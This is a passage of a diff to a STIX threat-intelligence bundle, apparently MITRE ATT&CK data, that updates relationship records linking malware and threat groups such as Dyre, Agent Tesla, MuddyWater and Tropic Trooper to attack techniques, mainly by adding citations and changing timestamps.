"source_ref": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9",
"relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-23T16:59:43.446Z",
+ "modified": "2020-04-29T22:15:31.440Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -81268,7 +82372,7 @@
{
"id": "relationship--921b3245-0795-40cd-82e1-04f38bc42b14",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) retrieves additional malicious payloads from the C2 server.(Citation: Talos ROKRAT)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) retrieves additional malicious payloads from the C2 server.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81277,19 +82381,24 @@
"url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.",
"source_name": "Talos ROKRAT"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.437Z",
+ "modified": "2020-05-21T17:07:02.740Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--854a3a7e-09a7-4523-ac7f-d625a0b50b6b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154)'s \"beacon\" payload is capable of capturing screen shots.(Citation: cobaltstrike manual)",
+ "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154)'s \"beacon\" payload is capable of capturing screenshots.(Citation: cobaltstrike manual)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81304,7 +82413,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-06-06T19:04:39.416Z",
+ "modified": "2020-06-03T20:20:56.526Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -81451,27 +82560,6 @@
"modified": "2019-07-14T21:15:55.270Z",
"created": "2017-05-31T21:33:27.062Z"
},
- {
- "id": "relationship--e931afd2-35b2-4f9f-9b7c-88093e822c7b",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) used various social media channels to spearphish victims.(Citation: SecureWorks Mia Ash July 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
- "type": "relationship",
- "modified": "2019-09-09T19:21:42.361Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--e5f75ae0-45f5-48b8-938f-f0d9e17e53eb",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -81651,16 +82739,16 @@
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.668Z",
+ "modified": "2020-06-22T17:54:15.767Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -81672,22 +82760,22 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.653Z",
+ "modified": "2020-04-21T23:09:31.072Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--812073c3-43c5-4f92-b396-56b669eee0ad",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)\t ",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81696,13 +82784,18 @@
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
}
],
"source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T01:01:23.744Z",
+ "modified": "2020-06-15T20:49:55.663Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -81719,12 +82812,12 @@
"url": "http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/"
}
],
- "source_ref": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414"
},
{
"id": "relationship--e7077a73-991e-4660-a13d-fb30dc36fab1",
@@ -81805,7 +82898,7 @@
{
"id": "relationship--cc13f316-0f88-4ed1-8790-b13bc35be119",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81814,13 +82907,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
"type": "relationship",
- "modified": "2020-02-05T15:01:45.077Z",
+ "modified": "2020-06-24T01:27:31.909Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -81993,7 +83091,7 @@
{
"id": "relationship--17f9d6c8-f938-4532-b834-3834655911b8",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -82002,13 +83100,18 @@
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
}
],
"source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"relationship_type": "uses",
"target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
"type": "relationship",
- "modified": "2020-03-16T18:17:54.358Z",
+ "modified": "2020-06-15T20:49:55.655Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -82025,12 +83128,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104"
},
{
"id": "relationship--cbb27eed-2e1c-4675-a077-28765060b349",
@@ -82077,7 +83180,7 @@
{
"id": "relationship--6d1074cb-a9eb-4237-b8b2-d823cfa1408b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -82086,13 +83189,18 @@
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
}
],
"source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"relationship_type": "uses",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2019-04-24T23:21:07.895Z",
+ "modified": "2020-06-15T20:49:55.661Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -82198,16 +83306,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.648Z",
+ "modified": "2020-04-21T23:09:31.584Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -83007,20 +84115,20 @@
{
"id": "relationship--d06420fb-1c4d-4a4e-b18e-4c0750310606",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
@@ -83028,16 +84136,26 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"type": "relationship",
- "modified": "2020-03-17T14:50:07.066Z",
+ "modified": "2020-05-18T19:04:38.089Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -83276,12 +84394,12 @@
"url": "https://github.com/peewpw/Invoke-PSImage"
}
],
- "source_ref": "tool--b52d6583-14a2-4ddc-8527-87fd2142558f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--b52d6583-14a2-4ddc-8527-87fd2142558f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"
},
{
"id": "relationship--ea46cbd0-7134-4ede-a117-47380ddd9b5c",
@@ -83339,7 +84457,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -83348,7 +84466,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.263Z",
+ "modified": "2020-04-16T19:41:40.637Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -83558,22 +84676,27 @@
{
"id": "relationship--788e8246-d835-42c6-b8b4-7efad31e4a84",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.657Z",
+ "modified": "2020-06-22T17:54:16.016Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -83756,13 +84879,13 @@
"description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) lists the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)",
"id": "relationship--431012d2-0ac4-49ba-b217-c118f0c1cf03",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.311Z",
+ "modified": "2020-05-28T23:41:03.806Z",
"created": "2019-01-29T18:44:04.832Z"
},
{
@@ -83945,15 +85068,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into a file dllhost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into dllhost.exe and svchost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--c31643e8-86a3-49e4-bd69-572d7e64c7c0",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"type": "relationship",
- "modified": "2020-03-16T19:31:41.375Z",
+ "modified": "2020-05-21T14:55:00.407Z",
"created": "2019-01-29T20:17:49.374Z"
},
{
@@ -84017,12 +85145,12 @@
"url": "https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf"
}
],
- "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b"
},
{
"id": "relationship--ce459961-3a5a-45f9-b8a4-646e9b475e19",
@@ -84549,15 +85677,20 @@
"description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
"source_name": "Fortinet Agent Tesla April 2018"
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) collects the username from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)",
"id": "relationship--3e370a6e-2a3c-4e56-aa57-fecab8d09709",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.274Z",
+ "modified": "2020-05-28T23:41:03.888Z",
"created": "2019-01-29T18:44:05.081Z"
},
{
@@ -84695,16 +85828,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T17:48:06.672Z",
+ "modified": "2020-04-21T23:09:31.622Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -84883,12 +86016,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00"
},
{
"id": "relationship--1da542f3-0003-4eb7-9bb6-1bd3cced9763",
@@ -85013,7 +86146,7 @@
{
"id": "relationship--ed94edc7-e687-409e-9143-20a15190bd83",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) uses HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -85028,7 +86161,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:34:57.812Z",
+ "modified": "2020-06-02T21:49:34.973Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -85062,15 +86195,20 @@
"description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
"source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
